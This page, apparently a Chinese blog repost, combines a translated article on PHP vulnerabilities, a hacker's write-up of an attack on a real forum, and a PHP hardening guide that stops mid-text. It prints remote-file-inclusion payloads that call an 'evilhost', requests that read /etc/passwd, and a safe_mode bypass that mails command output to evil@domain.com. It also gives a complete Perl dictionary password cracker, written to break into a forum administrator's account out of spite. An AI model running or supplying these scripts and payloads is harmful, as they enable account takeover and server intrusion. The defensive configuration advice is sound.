如何对PHP程序中的常见漏洞进行攻击(上)

正文开始

<p>http://lib.csdn.net/article/php/58784</p><p>http://blog.csdn.net/litowen/article/details/91022<br /></p> <p></p><p>如何对PHP程序中的常见漏洞进行攻击(上)<br /><br />原著:Shaun Clowes <<a href="http://www.securereality.com.au/%3e">http://www.securereality.com.au/></a><br />翻译:analysist <<a href="http://www.nsfocus.com/%3e">http://www.nsfocus.com/></a><br /><br />之所以翻译这篇文章,是因为目前关于CGI安全性的文章都是拿Perl作为例子,而专门介绍ASP,PHP或者JSP安全性的文章则很少。Shaun Clowes的这篇文章比较全面地介绍了PHP的安全问题,原文可以在<a href="http://www.securereality.com.au/studyinscarlet.txt">http://www.securereality.com.au/studyinscarlet.txt</a>找到。<br /><br />由于原文比较长,而且有相当一部分是介绍文章的背景或PHP的基础知识,没有涉及到PHP安全方面的内容,因此我没有翻译。如果你想了解这方面的知识,请参考原文。<br /><br />文章主要从全局变量,远程文件,文件上载,库文件,Session文件,数据类型和容易出错的函数这几个方面分析了PHP的安全性,并且对如何增强PHP的安全性提出了一些有用的建议。<br /><br />好了,废话少说,我们言归正传!<br /><br />[全局变量]<br />PHP中的变量不需要事先声明,它们会在第一次使用时自动创建,它们的类型也不需要指定,它们会根据上下文环境自动确定。从程序员的角度来看,这无疑是一种极其方便的处理方法。很显然,这也是快速开发语言的一个很有用的特点。一旦一个变量被创建了,就可以在程序中的任何地方使用。这个特点导致的结果就是程序员很少初始化变量,毕竟,当它们第一次创建时,他们是空的。<br /><br />很显然,基于PHP的应用程序的主函数一般都是接受用户的输入(主要是表单变量,上载文件和Cookie等),然后对输入数据进行处理,然后把结果返回到客户端浏览器。为了使PHP代码访问用户的输入尽可能容易,实际上PHP是把这些输入数据看作全局变量来处理的。<br /><br />例如:<br /><br /><FORM METHOD="GET" ACTION="test.php"><br /><INPUT TYPE="TEXT" NAME="hello"><br /><INPUT TYPE="SUBMIT"><br /></FORM><br /><br />很显然,这会显示一个文本框和提交按钮。当用户点击提交按钮时,“test.php”会处理用户的输入,当“test.php”运行时,“$hello”会包含用户在文本框输入的数据。从这里我们应该看出,攻击者可以按照自己的意愿创建任意的全局变量。如果攻击者不是通过表单输入来调用“test.php”,而是直接在浏览器地址栏输入<a href="http://server/test.php?hello=hi&setup=no">http://server/test.php?hello=hi&setup=no</a>,那么,不止是“$hello”被创建,“$setup”也被创建了。<br /><br />译者注:这两种方法也就是我们通常说的“POST”和“GET”方法。<br />下面的用户认证代码暴露了PHP的全局变量所导致的安全问题:<br /><br /><?php<br />  if ($pass == "hello")<br />    $auth = 1;<br />  ... <br />  if ($auth == 1)<br />    echo "some important information";<br />?><br />上面的代码首先检查用户的密码是否为“hello”,如果匹配的话,设置“$auth”为“1”,即通过认证。之后如果“$suth”为“1”的话,就会显示一些重要信息。<br /><br />表面看起来是正确的,而且我们中有相当一部分人是这样做的,但是这段代码犯了想当然的错误,它假定“$auth”在没有设置值的时候是空的,却没有想到攻击者可以创建任何全局变量并赋值,通过类似“<a href="http://server/test.php?auth=1">http://server/test.php?auth=1</a>”的方法,我们完全可以欺骗这段代码,使它相信我们是已经认证过的。<br /><br />因此,为了提高PHP程序的安全性,我们不能相信任何没有明确定义的变量。如果程序中的变量很多的话,这可是一项非常艰巨的任务。<br /><br />一种常用的保护方式就是检查数组HTTP_GET[]或POST_VARS[]中的变量,这依赖于我们的提交方式(GET或POST)。当PHP配置为打开“track_vars”选项的话(这是缺省值),用户提交的变量就可以在全局变量和上面提到的数组中获得。<br /><br />但是值得说明的是,PHP有四个不同的数组变量用来处理用户的输入。HTTP_GET_VARS数组用来处理GET方式提交的变量,HTTP_POST_VARS数组用于处理POST方式提交的变量,HTTP_COOKIE_VARS数组用于处理作为cookie头提交的变量,而对于HTTP_POST_FILES数组(比较新的PHP才提供),则完全是用户用来提交变量的一种可选方式。用户的一个请求可以很容易的把变量存在这四个数组中,因此一个安全的PHP程序应该检查这四个数组。<br /><br />[远程文件]<br />PHP是一种具有丰富特性的语言,提供了大量的函数,使编程者实现某个功能很容易。但是从安全的角度来看,功能越多,要保证它的安全性就越难,远程文件就是说明这个问题的一个很好的例子:<br /><br /><?php<br />  if (!($fd = fopen("$filename", "r"))<br />    echo("Could not open file: $filename<BR>/n");<br />?><br /><br />上面的脚本试图打开文件“$filename”,如果失败就显示错误信息。很明显,如果我们能够指定“$filename”的话,就能利用这个脚本浏览系统中的任何文件。但是,这个脚本还存在一个不太明显的特性,那就是它可以从任何其它WEB或FTP站点读取文件。实际上,PHP的大多数文件处理函数对远程文件的处理是透明的。<br /><br />例如:<br />如果指定“$filename”为“<a href="http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir">http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir</a>”<br />则上面的代码实际上是利用主机target上的unicode漏洞,执行了dir命令。<br /><br />这使得支持远程文件的include(),require(),include_once()和require_once()在上下文环境中变得更有趣。这些函数主要功能是包含指定文件的内容,并且把它们按照PHP代码解释,主要是用在库文件上。<br /><br />例如:<br /><?php<br />  include($libdir . "/languages.php");<br />?><br /><br />上例中“$libdir”一般是一个在执行代码前已经设置好的路径,如果攻击者能够使得“$libdir”没有被设置的话,那么他就可以改变这个路径。但是攻击者并不能做任何事情,因为他们只能在他们指定的路径中访问文件languages.php(perl中的“Poison null byte”攻击对PHP没有作用)。但是由于有了对远程文件的支持,攻击者就可以做任何事情。例如,攻击者可以在某台服务器上放一个文件languages.php,包含如下内容:<br /><br /><?php<br />  passthru("/bin/ls /etc");<br />?><br /><br />然后把“$libdir”设置为“<a href="http://%3cevilhost%3e/">http://<evilhost>/</a>”,这样我们就可以在目标主机上执行上面的攻击代码,“/etc”目录的内容作为结果返回到客户的浏览器中。<br /><br />需要注意的是,攻击服务器(也就是evilhost)应该不能执行PHP代码,否则攻击代码会在攻击服务器,而不是目标服务器执行,如果你想了解具体的技术细节,请参考:<a href="http://www.securereality.com.au/sradv00006.txt">http://www.securereality.com.au/sradv00006.txt</a><br /><br />[文件上载]<br />PHP自动支持基于RFC 1867的文件上载,我们看下面的例子:<br /><br /><FORM METHOD="POST" ENCTYPE="multipart/form-data"><br /><INPUT TYPE="FILE" NAME="hello"><br /><INPUT TYPE="HIDDEN" NAME="MAX_FILE_SIZE" VALUE="10240"><br /><INPUT TYPE="SUBMIT"><br /></FORM><br /><br />上面的代码让用户从本地机器选择一个文件,当点击提交后,文件就会被上载到服务器。这显然是很有用的功能,但是PHP的响应方式使这项功能变的不安全。当PHP第一次接到这种请求,甚至在它开始解析被调用的PHP代码之前,它会先接受远程用户的文件,检查文件的长度是否超过“$MAX_FILE_SIZE variable”定义的值,如果通过这些测试的话,文件就会被存在本地的一个临时目录中。<br /><br />因此,攻击者可以发送任意文件给运行PHP的主机,在PHP程序还没有决定是否接受文件上载时,文件已经被存在服务器上了。<br /><br />这里我就不讨论利用文件上载来对服务器进行DOS攻击的可能性了。<br /><br />让我们考虑一下处理文件上载的PHP程序,正如我们上面说的,文件被接收并且存在服务器上(位置是在配置文件中指定的,一般是/tmp),扩展名一般是随机的,类似“phpxXuoXG”的形式。PHP程序需要上载文件的信息以便处理它,这可以通过两种方式,一种方式是在PHP 3中已经使用的,另一种是在我们对以前的方法提出安全公告后引入的。<br /><br />但是,我们可以肯定的说,问题还是存在的,大多数PHP程序还是使用老的方式来处理上载文件。PHP设置了四个全局变量来描述上载文件,比如说上面的例子:<br /><br />$hello = Filename on local machine (e.g "/tmp/phpxXuoXG")<br />$hello_size = Size in bytes of file (e.g 1024)<br />$hello_name = The original name of the file on the remote system (e.g "c://temp//hello.txt")<br />$hello_type = Mime type of uploaded file (e.g "text/plain")<br /><br />然后PHP程序开始处理根据“$hello”指定的文件,问题在于“$hello”不一定是一个PHP设置的变量,任何远程用户都可以指定它。如果我们使用下面的方式:<br /><br /><a href="http://vulnhost/vuln.php?hello=/etc/passwd&hello_size=10240&hello_type=text/plain&hello_name=hello.txt">http://vulnhost/vuln.php?hello=/etc/passwd&hello_size=10240&hello_type=text/plain&hello_name=hello.txt</a><br /><br />就导致了下面的PHP全局变量(当然POST方式也可以(甚至是Cookie)):<br /><br />$hello = "/etc/passwd"<br />$hello_size = 10240<br />$hello_type = "text/plain"<br />$hello_name = "hello.txt"<br /><br />上面的表单数据正好满足了PHP程序所期望的变量,但是这时PHP程序不再处理上载的文件,而是处理“/etc/passwd”(通常会导致内容暴露)。这种攻击可以用于暴露任何敏感文件的内容。<br /><br />我在前面已经说了,新版本的PHP使用HTTP_POST_FILES[]来决定上载文件,同时也提供了很多函数来解决这个问题,例如有一个函数用来判断某个文件是不是实际上载的文件。这些函数很好的解决了这个问题,但是实际上肯定有很多PHP程序仍然使用旧的方法,很容易受到这种攻击。<br /><br />作为文件上载的攻击方法的一个变种,我们看一下下面的一段代码:<br /><br /><?php<br />  if (file_exists($theme)) // Checks the file exists on the local system (no remote files)<br />include("$theme");<br />?><br /><br />如果攻击者可以控制“$theme”的话,很显然它可以利用“$theme”来读取远程系统上的任何文件。攻击者的最终目标是在远程服务器上执行任意指令,但是他无法使用远程文件,因此,他必须得在远程服务器上创建一个PHP文件。这乍看起来好象是不可能的,但是文件上载帮了我们这个忙,如果攻击者先在本地机器上创建一个包含PHP代码的文件,然后创建一个包含名为“theme”的文件域的表单,最后用这个表单通过文件上载把创建的包含PHP代码的文件提交给上面的代码,PHP就会把攻击者提交的文件保存起来,并把“$theme”的值设置为攻击者提交的文件,这样file_exists()函数会检查通过,攻击者的代码也将执行。<br /><br />获得执行任意指令的能力之后,攻击者显然想提升权限或者是扩大战果,而这又需要一些服务器上没有的工具集,而文件上载又一次帮了我们这个忙。攻击者可以使用文件上载功能上载工具,把她们存在服务器上,然后利用他们执行指令的能力,使用chmod()改变文件的权限,然后执行。例如:攻击者可以绕过防火墙或IDS上载一个本地root攻击程序,然后执行,这样就获得了root权限。</p><p> </p>如何对PHP程序中的常见漏洞进行攻击(下) [库文件]<br />正如我们前面讨论的那样,include()和require()主要是为了支持代码库,因为我们一般是把一些经常使用的函数放到一个独立的文件中,这个独立的文件就是代码库,当需要使用其中的函数时,我们只要把这个代码库包含到当前的文件中就可以了。<br /><br />最初,人们开发和发布PHP程序的时候,为了区别代码库和主程序代码,一般是为代码库文件设置一个“.inc”的扩展名,但是他们很快发现这是一个错误,因为这样的文件无法被PHP解释器正确解析为PHP代码。如果我们直接请求服务器上的这种文件时,我们就会得到该文件的源代码,这是因为当把PHP作为Apache的模块使用时,PHP解释器是根据文件的扩展名来决定是否解析为PHP代码的。扩展名是站点管理员指定的,一般是“.php”, “.php3”和“.php4”。如果重要的配置数据被包含在没有合适的扩展名的PHP文件中,那么远程攻击者很容易得到这些信息。<br /><br />最简单的解决方法就是给每个文件都指定一个PHP文件的扩展名,这样可以很好的防止泄露源代码的问题,但是又产生了新的问题,通过请求这个文件,攻击者可能使本该在上下文环境中运行的代码独立运行,这可能导致前面讨论的全部攻击。<br /><br />下面是一个很明显的例子:<br /><br />In main.php:<br /><?php<br />  $libDir = "/libdir";<br />  $langDir = "$libdir/languages";<br /><br />  ...<br /><br />  include("$libdir/loadlanguage.php":<br />?><br /><br />In libdir/loadlanguage.php:<br /><?php<br />  ...<br /><br />  include("$langDir/$userLang");<br />?><br /><br />当“libdir/loadlanguage.php”被“main.php”调用时是相当安全的,但是因为“libdir/loadlanguage”具有“.php”的扩展名,因此远程攻击者可以直接请求这个文件,并且可以任意指定“$langDir”和“$userLang”的值。<br />[Session文件]<br />PHP 4或更新的版本提供了对sessions的支持,它的主要作用是在PHP程序中保存页与页之间的状态信息。例如,当一个用户登陆进入网站,他登陆了这个事实以及谁登陆进入这个网站都被保存在session中,当他在网站中到处浏览时,所有的PHP代码都可以获得这些状态信息。<br /><br />事实上,当一个session启动时(实际上是在配置文件中设置为在第一次请求时自动启动),就会生成一个随机的“session id”,如果远程浏览器总是在发送请求时提交这个“session id”的话,session就会一直保持。这通过Cookie很容易实现,也可以通过在每页提交一个表单变量(包含“session id”)来实现。PHP程序可以用session注册一个特殊的变量,它的值会在每个PHP脚本结束后存在session文件中,也会在每个PHP脚本开始前加载到变量中。下面是一个简单的例子:<br /><br /><?php<br />  session_destroy(); // Kill any data currently in the session<br />  $session_auth = "shaun";<br />  session_register("session_auth"); // Register $session_auth as a session variable<br />?><br /><br />新版本的PHP都会自动把“$session_auth”的值设置为“shaun”,如果它们被修改的话,以后的脚本都会自动接受修改后的值,这对无状态的Web来说的确是种很不错的工具,但是我们也应该小心。<br /><br />一个很明显的问题就是确保变量的确来自session,例如,给定上面的代码,如果后续的脚本是下面这样的话:<br /><br /><?php<br />  if (!empty($session_auth))<br />   // Grant access to site here<br />?><br /><br />上面的代码假定如果“$session_auth”被置位的话,就是从session,而不是从用户输入来置位的,如果攻击者通过表单输入来置位的话,他就可以获得对站点的访问权。注意攻击者必须在session注册该变量之前使用这种攻击方法,一旦变量被放进了session,就会覆盖任何表单输入。<br /><br />Session数据一般是保存在文件中(位置是可配置的,一般是“/tmp”),文件名一般是类似“sess_<session id>”的形式,这个文件包含变量名称,变量类型,变量值和一些其它的数据。在多主机系统中,因为文件是以运行Web服务器的用户身份(一般是nobody)保存的,因此恶意的站点拥有者就可以通过创建一个session文件来获得对其它站点的访问,甚至可以检查session文件中的敏感信息。<br /><br />Session机制也为攻击者把自己的输入保存在远程系统的文件中提供了另一个方便的地方,对于上面的例子来说,攻击者需要在远程系统放置一个包含PHP代码的文件,如果不能利用文件上载做到的话,他通常会利用session为一个变量按照自己的意愿赋一个值,然后猜测session文件的位置,而他知道文件名是“php<session id>”,所以只需猜测目录,而目录一般就是“/tmp”。<br /><br />另外,攻击者可以任意指定“session id”(例如“hello”),然后用这个“session id”创建一个session文件(例如“/tmp/sess_hello”),但是“session id”只能是字母和数字组合。<br /><br />[数据类型]<br />PHP具有比较松散的数据类型,变量的类型依赖于它们所处的上下文环境。例如:“$hello”开始是字符串变量,值为“”,但是在求值时,就变成了整形变量“0”,这有时可能会导致一些意想不到的结果。如果“$hello”的值为“000”还是为“0”是不同的,empty()返回的结果也不会为真。<br /><br />PHP中的数组是关联数组,也就是说,数组的索引是字符串型的。这意味着“$hello["000"]”和“$hello[0]”也是不同的。<br /><br />开发程序的时候应该仔细地考虑上面的问题,例如,我们不应该在一个地方测试某个变量是否为“0”,而在另外的地方使用empty()来验证。<br /><br />[容易出错的函数]<br />我们在分析PHP程序中的漏洞时,如果能够拿到源代码的话,那么一份容易出错的函数列表则是我们非常需要的。如果我们能够远程改变这些函数的参数的话,那么我们就很可能发现其中的漏洞。下面是一份比较详细的容易出错的函数列表:<br /><br /><PHP代码执行><br />require():读取指定文件的内容并且作为PHP代码解释<br />include():同上<br />eval():把给定的字符串作为PHP代码执行<br />preg_replace():当与“/e”开关一起使用时,替换字符串将被解释为PHP代码<br /><br /><命令执行><br />exec():执行指定的命令,返回执行结果的最后一行<br />passthru():执行指定命令,返回所有结果到客户浏览器<br />``:执行指定命令,返回所有结果到一个数组<br />system():同passthru(),但是不处理二进制数据<br />popen():执行指定的命令,把输入或输出连接到PHP文件描述符<br /><br /><文件泄露><br />fopen():打开文件,并对应一个PHP文件描述符<br />readfile():读取文件的内容,然后输出到客户浏览器<br />file():把整个文件内容读到一个数组中<br /><br />译者注:其实这份列表还不是很全,比如“mail()”等命令也可能执行命令,所以需要自己补充一下。<br />[如何增强PHP的安全性]<br />我在上面介绍的所有攻击对于缺省安装的PHP 4都可以很好的实现,但是我已经重复了很多次,PHP的配置非常灵活,通过配置一些PHP选项,我们完全可能抵抗其中的一些攻击。下面我按照实现的难度对一些配置进行了分类:<br /><br />*低难度<br />**中低难度<br />***中高难度<br />****高难度<br /><br />上面的分类只是个人的看法,但是我可以保证,如果你使用了PHP提供的所有选项的话,那么你的PHP将是很安全的,即使是第三方的代码也是如此,因为其中很多功能已经不能使用。<br /><br />**** 设置“register_globals”为“off”<br />这个选项会禁止PHP为用户输入创建全局变量,也就是说,如果用户提交表单变量“hello”,PHP不会创建“$ hello”,而只会创建“HTTP_GET/POST_VARS['hello']”。这是PHP中一个极其重要的选项,关闭这个选项,会给编程带来很大的不便。<br /><br />*** 设置“safe_mode”为“on”<br />打开这个选项,会增加如下限制:<br />1.    限制哪个命令可以被执行<br />2.    限制哪个函数可以被使用<br />3.    基于脚本所有权和目标文件所有权的文件访问限制<br />4.    禁止文件上载功能<br />这对于ISP来说是一个伟大的选项,同时它也能极大地改进PHP的安全性。<br /><br />** 设置“open_basedir”<br />这个选项可以禁止指定目录之外的文件操作,有效地消除了本地文件或者是远程文件被include()的攻击,但是仍需要注意文件上载和session文件的攻击。<br /><br />** 设置“display_errors”为“off”,设置“log_errors”为“on”<br />这个选项禁止把错误信息显示在网页中,而是记录到日志文件中,这可以有效的抵制攻击者对目标脚本中函数的探测。<br /><br />* 设置“allow_url_fopen”为“off”<br />这个选项可以禁止远程文件功能,极力推荐!<br /><br />好了,文章到此为止了,如果你想了解一些其它的相关信息,请参考原文<a href="http://www.securereality.com.au/studyinscarlet.txt">http://www.securereality.com.au/studyinscarlet.txt</a>。<br /><br /><全文完><br /> 一次简单脚本攻击实例<p>一、开篇<br />今天闲着无聊,到本地区的一个社区上转转,那些人污言秽语的,有个帖子还侵犯了一个朋友的版权,跟贴说了那人几句,管理员也不管,实在看不下去了,打算给管理员盆冷水清醒清醒<br /><br />二、准备/分析<br />安全第一,先开个HTTP代理,打开社区的登陆页面,看到上面显示的URL是<a href="http://www/">http://www</a>.****bbs.com/login.cgi<br />打开页面的源代码,找到登陆的关键几句:<br /><form action="login.cgi" method="post"><br /><input type="hidden" name="menu" value="login"><br /><input type="hidden" name="id" value=""><br />用户名:<input size="25" name="username" class="i06"><br />密 码:<input type="password" size="25" value name="userpsd" class="i06"><br /></form><br />所以,提交登陆信息的URL应该是<a href="http://wwww/">http://wwww</a>.****bbs.com/login.cgi?username=ID&userpsd=PWD&menu=login&id=<br /><br />习惯先查看用户信息,因为一般情况下用户名和密码都是紧连着保存在一起的,在这里我们更容易接近我们想要的信息。提交如下URL查看silkroad用户信息:<br /><a href="http://www/">http://www</a>.****bbs.com/yhreg.cgi?menu=viewuser&username=silkroad<br />返回正常用户信息<br /><br /><a href="http://www/">http://www</a>.****bbs.com/yhreg.cgi?menu=viewuser&username=./silkroad<br />同样返回正常用户信息,看来.和/已经被过滤掉了<br /><br /><a href="http://www/">http://www</a>.****bbs.com/yhreg.cgi?menu=viewuser&username=silkroad%00<br />提示此用户没有被注册 :(<br /><br />扫描看看,有FTP弱口令~可惜是anonymous,价值不大<br /><br />回到CGI上,只在<a href="http://www/">http://www</a>.****bbs.com/rank.cgi这上面发现用的是Yuzi的BBS3000。下面也可以下载BBS3000分析源代码,但比较费时间,我们先到几处敏感的地方看看<br /><a href="http://www/">http://www</a>.****bbs.com/photo.cgi可以上传头像<br />由于头像的显示是<img src=***></img><br />关键就在***这里,即图片的连接<br />在要上传的头像的输入栏中填入</img>qq~;open F,">the0crat.txt";<img src=>.gif试试,提交,没有任何提示,程序也没对图片进行任何改变<br /><br />换个角度来看,既不分析源代码,也不入侵目标服务器,那么还是来试试探测探测社区管理员的密码,难说我今天运气比较好 :)<br />当然社区上的管理员也不会是**,不会设个空密码等你去玩。提到探测论坛ID的密码,大家首先想到的是什么?下载个又大又没趣的黑客软件来挂个字典?难道就没有点想要自己动手写一个脚本来破密码的冲动?嘿嘿。现在就教你自己动手一步一步来对密码进行探测  :)<br /><br />密码探测的一般方法是<br />     ①取得预进行猜测的密码列表<br />                 |<br />                 |<br />                 |<br />      ②向目标依次提交密码       <---------<br />                 |                        |<br />                 |                        |<br />                 |                        |<br />③根据目标的响应判断密码是否正确         |<br />           |           |                  |<br />           |           |                  |<br />           |           |                  |<br />        密码正确    密码错误              |<br />           |           |                  |<br />           |           |                  |<br />           |           |                  |<br />     返回给用户密码   Next-----------------<br /><br />第三步要绕个圈子,其他的几步用程序就能很简单的实现<br />所以先从第三步开始:<br />我不了解别的那些程序是怎么进行判断的,估计是先取得成功登陆和密码错误的两个页面的代码,然后对比它们的不同点,可能还有别的办法,可我还没想到~~~:)<br />所以,首先注册个ID,帐号asdfasdf,密码asdfasdf,根据前面取得的信息,此ID提交的URL为<a href="http://www/">http://www</a>.****bbs.com/login.cgi?username=asdfasdf&userpsd=asdfasdf&menu=login&id=,"username="这后面的是用户ID,"userpsd="这后面是用户密码,然后登出社区<br />现在用telnet去取得我们想要的信息:<br /><br />F:/>nc -vv www.****bbs.com 80               <<<-----用nc连接目标WEB服务的端口,别说你不知道nc是什么,嘿嘿<br />Warning: inverse host lookup failed for ***.***.***.***: h_errno 11004: NO_DATA<br /><br />www.****bbs.com [***.***.***.***] 80 (http) open<br />GET <a href="http://www/">http://www</a>.****bbs.com/login.cgi?username=asdfasdf&userpsd=error&menu=login&id= HTTP/1.1 <Enter>          <<<-------这里用到前面提到的提交用户登陆信息的URL,但用的是错误密码<br />host:iis-server <Enter><Enter><br /><br />HTTP/1.1 200 OK<br />Date: Mon, 18 Aug 2003 11:59:41 GMT<br />Server: Apache/1.3.26 (Unix) PHP/4.0.6<br />Transfer-Encoding: chunked<br />Content-Type: text/html<br /><br />fe7                                 <<<------------注意这个<br /><html><br /><head><br /><meta http-equiv=Content-Type content=text/html; charset=gb2312><br /><link REL="SHORTCUT ICON" href=http://www.****bbs.com/pic/ybb.ico><br />......<br /><br />这个是非成功登陆后返回的信息<br />再来:<br /><br />F:/>nc -vv www.****bbs.com 80<br />Warning: inverse host lookup failed for ***.***.***.***: h_errno 11004: NO_DATA<br /><br />www.****bbs.com [***.***.***.***] 80 (http) open<br />GET <a href="http://www/">http://www</a>.****bbs.com/login.cgi?username=asdfasdf&userpsd=asdfasdf&menu=login&id= HTTP/1.1       <<<-------这次用的是正确的密码<br />host:iis-server<br /><br />HTTP/1.1 200 OK<br />Date: Mon, 18 Aug 2003 12:09:43 GMT<br />Server: Apache/1.3.26 (Unix) PHP/4.0.6<br />Transfer-Encoding: chunked<br />Content-Type: text/html<br /><br />18d                 <<<------------注意这个<br /><html><head><meta http-equiv=Content-Type content=text/html; charset=gb2312><br /><SCRIPT><br />expireDate=new Date;<br />expireDate.setYear(expireDate.getYear()+1);<br />......<br /><br />这个是成功登陆后返回的信息<br /><br />返回的信息的第七行"fe7"和"18d"不同,我们就从这里下手<br /><br />现在到社区的管理团队上看看管理员的ID,其中一个管理员的ID是“秘密”<br /><br />三、程序代码/代码解析<br />思路(步骤):<br />取得IP ---> 打开字典,字典里每一行一个密码 ---> socket() ---> connect() ---> 向目标主机WEB端口提交数据,此数据中所提交的密码用一个变量来代替,这个变量就是字典里的密码 ---> 将返回的信息保存,用先前提到的登陆成功/失败返回信息的不同点进行对比,判断是否登陆成功,即密码是否正确 ---> [ 当前密码正确--->输出正确的密码并退出程序; 当前密码错误--->从第二步骤开始重复,直到密码正确或试完字典里的所有密码 ]<br /><br />#!/usr/bin/perl<br />#################################<br />#Password Cracker<br />#Author:HBU-the0crat<br />#E-mail:the0crat@hotmail.com<br />#Date:2003/8/18<br />#################################<br /><br />use Socket;   #使用Socket模块<br /><br />my $ARGC=@ARGV;   #取得参数的数量<br />if($ARGC!=1){print "/nPassword Cracker Tool By HBU-the0crat/nUsage:$0 TargetIP/n";exit;}<br /><br />my $host=shift;   #获取主机IP<br />print "/nSending...";<br /><br />open(FH,"<dic.dic");    #挂字典<br /><br />while(<FH>)   #读取字典<br />{<br />chomp;<br />my $pwd=$_;<br />my $req="GET <a href="http://www/">http://www</a>.****bbs.com/login.cgi?username=asdfasdf&userpsd=$pwd&menu=login&id= HTTP/1.1/n"."host:iis-server/n/n";   #提交的信息<br /><br />my @res=sendraw($req);   #将目标服务器返回的信息保存为数组<br /><br />if($res[6]=~/fe7/g)  #从@res数组中取得所返回信息的第7行,并进行判断。判断依据:前文中用telnet所获知的用来判断密码是否正确的字符<br />{print "/npwd:$pwd error";}   #如果返回的信息中的第7行中包含fe7这三个字符,则在屏幕上打印出密码错误的信息<br />else<br />{<br />print "/npwd:$pwd passed";   #因为成功登陆后返回的信息中的第7行不包含fe7这三个字符,所以如果第7行中不包含fe7这三个字符就表示登陆成功,即密码正确<br />close(FH);<br />exit;   #探测到正确密码立刻退出<br />}<br /><br />}   #对比判断是否登陆成功的循环<br />close(FH);<br /><br />sub sendraw {<br />my ($req2) = @_;<br />my $target;<br />$target = inet_aton($host) or die "/ninet_aton problems";   #转换目标IP<br />socket(Handle,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) or die "/nSocket problems/n";   #Socket<br />if(connect(Handle,pack "SnA4x8",2,80,$target)){   #此例中为80端口,根据实际情况更改<br />select(Handle);<br />$| = 1;<br />print $req2;   #向目标服务器提交登陆资料<br />my @res2 = <Handle>;   #取得目标服务器返回的信息<br />select(STDOUT);<br />close(Handle);<br />return @res2;   #将目标服务器返回的信息作为sendraw()函数的返回值<br />}<br />else {<br />die("/nCan't connect to $host:80.../n");<br />}<br />}<br /><br />四、演示<br />dic.dic内容如下:<br />asdf<br />asdfasdf<br />asdfa<br />运行这个脚本(win2k+activeperl5.6下通过)<br />C:/>cracker.pl www.****bbs.com<br /><br />Sending...<br />pwd:asdf error<br />pwd:asdfasdf passed<br /><br />程序探测到正确密码后退出...:)<br /><br />注意要根据实际情况更改提交的信息和判断依据,以及WEB端口<br /><br />挂个字典,就可以慢慢等密码出来了,然而更多时候是取决于你的运气<br /><br />五、总结<br />弊:这段代码用的是单线程,所以在探测的速度上不是很理想,有兴趣的可以去改改,在没有使用跳板的情况下对自己不安全,而且成功率很大程度上取决于你的运气<br />利:这种方法比较有效, 但也是比较没有效率的密码破解方式<br /><br />六、结尾<br />感谢各位对我的支持,特别感谢小金和明明可爱给予的帮助,才使得这篇文章得以与大家见面 :)<br /><br />本文只可研究学习,本人对因这篇文章而导致的一切后果,不承担任何法律责任。</p><br /><p> </p>PHP安全配置<p><br />一、Web服务器安全<br /><br />PHP其实不过是Web服务器的一个模块功能,所以首先要保证Web服务器的安全。当然Web服务器要安全又必须是先保证系统安全,这样就扯远了,无穷无尽。PHP可以和各种Web服务器结合,这里也只讨论Apache。非常建议以chroot方式安装启动Apache,这样即使Apache和PHP及其脚本出现漏洞,受影响的也只有这个禁锢的系统,不会危害实际系统。但是使用chroot的Apache后,给应用也会带来一定的麻烦,比如连接mysql时必须用127.0.0.1地址使用tcp连接而不能用localhost实现socket连接,这在效率上会稍微差一点。还有mail函数发送邮件也是个问题,因为php.ini里的:<br /><br />[mail function]<br />; For Win32 only.<br />SMTP = localhost<br /><br />; For Win32 only.<br />sendmail_from = me@localhost.com<br /><br />都是针对Win32平台,所以需要在chroot环境下调整好sendmail。<br /><br />二、PHP本身问题<br /><br />1、远程溢出<br /><br />PHP-4.1.2以下的所有版本都存在文件上传远程缓冲区溢出漏洞,而且攻击程序已经广泛流传,成功率非常高:<br /><br /><a href="http://packetstormsecurity.org/0204-exploits/7350fun">http://packetstormsecurity.org/0204-exploits/7350fun</a><br /><a href="http://hsj.shadowpenguin.org/misc/php3018_exp.txt">http://hsj.shadowpenguin.org/misc/php3018_exp.txt</a><br /><br />2、远程拒绝服务<br /><br />PHP-4.2.0和PHP-4.2.1存在PHP multipart/form-data POST请求处理远程漏洞,虽然不能获得本地用户权限,但是也能造成拒绝服务。<br /><br />3、safe_mode绕过漏洞<br /><br />还有PHP-4.2.2以下到PHP-4.0.5版本都存在PHP mail函数绕过safe_mode限制执行命令漏洞,4.0.5版本开始mail函数增加了第五个参数,由于设计者考虑不周可以突破safe_mode的限制执行命令。其中4.0.5版本突破非常简单,只需用分号隔开后面加shell命令就可以了,比如存在PHP脚本evil.php:<br /><br /><? mail("foo@bar,"foo","bar","",$bar); ?> <br /><br />执行如下的URL:<br /><br /><a href="http://foo.com/evil.php?bar=;/usr/bin/id%7Cmail">http://foo.com/evil.php?bar=;/usr/bin/id|mail</a> evil@domain.com<br /><br />这将id执行的结果发送给evil@domain.com。<br /><br />对于4.0.6至4.2.2的PHP突破safe_mode限制其实是利用了sendmail的-C参数,所以系统必须是使用sendmail。如下的代码能够突破safe_mode限制执行命令:<br /><br /><?<br /># 注意,下面这两个必须是不存在的,或者它们的属主和本脚本的属主是一样<br />$script="/tmp/script123";<br />$cf="/tmp/cf123";<br /><br />$fd = fopen($cf, "w");<br />fwrite($fd, "OQ/tmp<br />Sparse=0<br />R$*" . chr(9) . "$#local $@ $1 $: $1<br />Mlocal, P=/bin/sh, A=sh $script");<br />fclose($fd);<br /><br />$fd = fopen($script, "w");<br />fwrite($fd, "rm -f $script $cf; ");<br />fwrite($fd, $cmd);<br />fclose($fd);<br /><br />mail("nobody", "", "", "", "-C$cf");<br />?><br /><br />还是使用以上有问题版本PHP的用户一定要及时升级到最新版本,这样才能消除基本的安全问题。<br /><br />三、PHP本身的安全配置<br /><br />PHP的配置非常灵活,可以通过php.ini, httpd.conf, .htaccess文件(该目录必须设置了AllowOverride All或Options)进行设置,还可以在脚本程序里使用ini_set()及其他的特定的函数进行设置。通过phpinfo()和get_cfg_var()函数可以得到配置选项的各个值。<br /><br />如果配置选项是唯一PHP_INI_SYSTEM属性的,必须通过php.ini和httpd.conf来修改,它们修改的是PHP的Master值,但修改之后必须重启apache才能生效。其中php.ini设置的选项是对Web服务器所有脚本生效,httpd.conf里设置的选项是对该定义的目录下所有脚本生效。<br /><br />如果还有其他的PHP_INI_USER,  PHP_INI_PERDIR, 